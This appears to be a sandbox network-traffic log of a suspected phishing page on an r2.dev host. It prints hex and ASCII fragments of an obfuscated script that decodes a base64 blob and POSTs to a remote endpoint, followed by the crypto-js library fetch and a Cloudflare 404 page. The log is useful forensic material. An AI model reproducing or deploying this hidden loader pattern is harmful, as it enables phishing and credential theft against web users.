2024-07-04 19:05:59 UTC	1369	IN	Data Raw: 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 66 69 67 22 3e 3c 64 69 76 20 69 64 3d 22 73 74 72 75 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 75 73 74 6f 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 73 70 61 6e 20 68 69 64 64 65 6e 3e 42 75 73 69 6e 65 73 73 65 73 20 6d 61 6b 65 20 70 6f 73 69 74 69 76 65 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 74 6f 20 63 6f 6d 6d 75 6e 69 74 69 65 73 2e 3c 2f 73 70 61 6e 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6d 69 6e 64 66 75 6c 6e 65 73 73 28 68 65 61 6c 74 68 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 Data Ascii: </div><div id="fig"><div id="strut"><div class="gusto"></div></div></div></div><span hidden>Businesses make positive contributions to communities.</span> </body><script> async function mindfulness(health) { var {a,b,c,d} = JSON.parse(
2024-07-04 19:05:59 UTC	319	IN	Data Raw: 59 54 49 35 5a 54 5a 6b 4e 54 68 6b 4e 7a 63 77 4f 54 4e 68 4e 7a 41 7a 4e 54 6b 31 4e 6d 4a 68 4f 44 6c 69 4f 44 49 7a 4f 47 51 31 5a 54 46 69 5a 57 51 78 4f 54 42 6a 49 69 77 69 5a 43 49 36 49 6a 59 7a 4e 6a 45 32 5a 54 63 30 4e 6a 45 32 59 7a 5a 6d 4e 7a 55 33 4d 44 59 31 49 6e 30 3d 60 29 29 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 74 68 6f 64 3a 20 27 50 4f 53 54 27 2c 20 62 6f 64 79 3a 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 20 6b 65 65 6e 3a 20 22 70 61 70 61 79 61 22 20 7d 29 0d 0a 20 20 20 20 20 20 20 20 7d 29 29 2e 74 65 78 74 28 29 29 29 3b 0d 0a 20 20 20 20 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 3c 64 69 76 3e 4d 75 73 63 6c 65 73 20 61 72 65 20 6c 69 6b 65 20 63 61 72 73 3b 20 74 68 65 Data Ascii: YTI5ZTZkNThkNzcwOTNhNzAzNTk1NmJhODliODIzOGQ1ZTFiZWQxOTBjIiwiZCI6IjYzNjE2ZTc0NjE2YzZmNzU3MDY1In0=`)), { method: 'POST', body: JSON.stringify({ keen: "papaya" }) })).text())); })();</script>... <div>Muscles are like cars; the

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:06:00 UTC	589	OUT	GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 19:06:00 UTC	964	IN	HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 19:06:00 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e2d-bb78" Last-Modified: Mon, 04 May 2020 16:09:17 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 232265 Expires: Tue, 24 Jun 2025 19:06:00 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXDyUwFu0NKZ%2FOBQooJdpEWBYWFmjdFu4QzZ2HpXJOPf0yhsK9%2BsoeXIpxNdLbVrziUl4i12D%2B6aT%2BVHSmpqPkt8OGTsqdPxGs9yD3aEiaSxDXENH1FfBBl67jGzR%2BdM%2BMoBiVfr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 89e163d71fc64251-EWR alt-svc: h3=":443"; ma=86400
2024-07-04 19:06:00 UTC	405	IN	Data Raw: 33 39 39 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a Data Ascii: 3998!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%48&255;e[i+o>>>2]\|=s<<24-(i+o)%48}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?l.ceil(s):l.max((0\|s)-this._minBufferSize,0))o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)\|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)\|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)\|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((nn>>>17)+no>>>15)+o*o,c=((4294901760&i)
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 Data Ascii: >>>6-o%42,a=s\|c;i[n>>>2]\|=a<<24-n%48,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r\|~e&i)+n+s;return(c<<o\|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i\|r&~i)+n+s;return(c<<o\|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
2024-07-04 19:06:00 UTC	1369	IN	Data Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0\|t))\|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:06:00 UTC	651	OUT	GET /favicon.ico HTTP/1.1 Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 19:06:01 UTC	180	IN	HTTP/1.1 404 Not Found Date: Thu, 04 Jul 2024 19:06:01 GMT Content-Type: text/html Content-Length: 27150 Connection: close Server: cloudflare CF-RAY: 89e163dc7a810f4d-EWR
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 31 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 31 20 33 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 32 20 33 73 20 30 2e 36 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a Data Ascii: teX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-siz
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 34 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 31 34 20 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" fill="none" xmlns="http://www.w3.org/2000/svg" >
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 32 2e 36 39 32 20 31 30 2e 32 33 34 37 48 31 32 36 2e 34 30 32 56 32 34 2e 30 33 34 35 48 31 32 32 2e 36 39 32 56 31 30 2e 32 33 34 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 38 35 2e 36 37 37 35 20 35 37 2e Data Ascii: 34C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC" /> <path d="M122.692 10.2347H126.402V24.0345H122.692V10.2347Z" fill="#0055DC" /> <path d="M85.6775 57.
2024-07-04 19:06:01 UTC	1369	IN	Data Raw: 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31 33 36 2e 31 37 36 20 31 31 33 2e 32 38 31 20 31 33 36 2e 37 30 34 20 31 31 34 2e 35 35 35 20 31 33 37 2e 36 34 33 20 31 31 35 2e 34 39 34 43 31 33 38 2e 35 38 32 20 31 31 36 2e 34 33 33 20 31 33 39 2e 38 35 36 20 31 31 36 2e 39 36 31 20 31 34 31 2e 31 38 34 20 31 31 36 2e 39 36 31 43 31 34 31 2e 38 34 32 20 31 31 36 2e 39 36 32 20 31 34 32 2e 34 39 34 20 31 31 36 2e 38 33 33 20 31 34 33 2e 31 30 33 20 31 31 36 2e 35 38 32 43 31 34 33 2e 37 31 31 20 31 31 36 2e 33 33 31 20 31 34 34 2e 32 36 34 20 31 31 35 2e 39 36 32 20 31 34 34 2e 37 Data Ascii: ll="#0055DC" /> <path d="M136.176 111.953C136.176 113.281 136.704 114.555 137.643 115.494C138.582 116.433 139.856 116.961 141.184 116.961C141.842 116.962 142.494 116.833 143.103 116.582C143.711 116.331 144.264 115.962 144.7
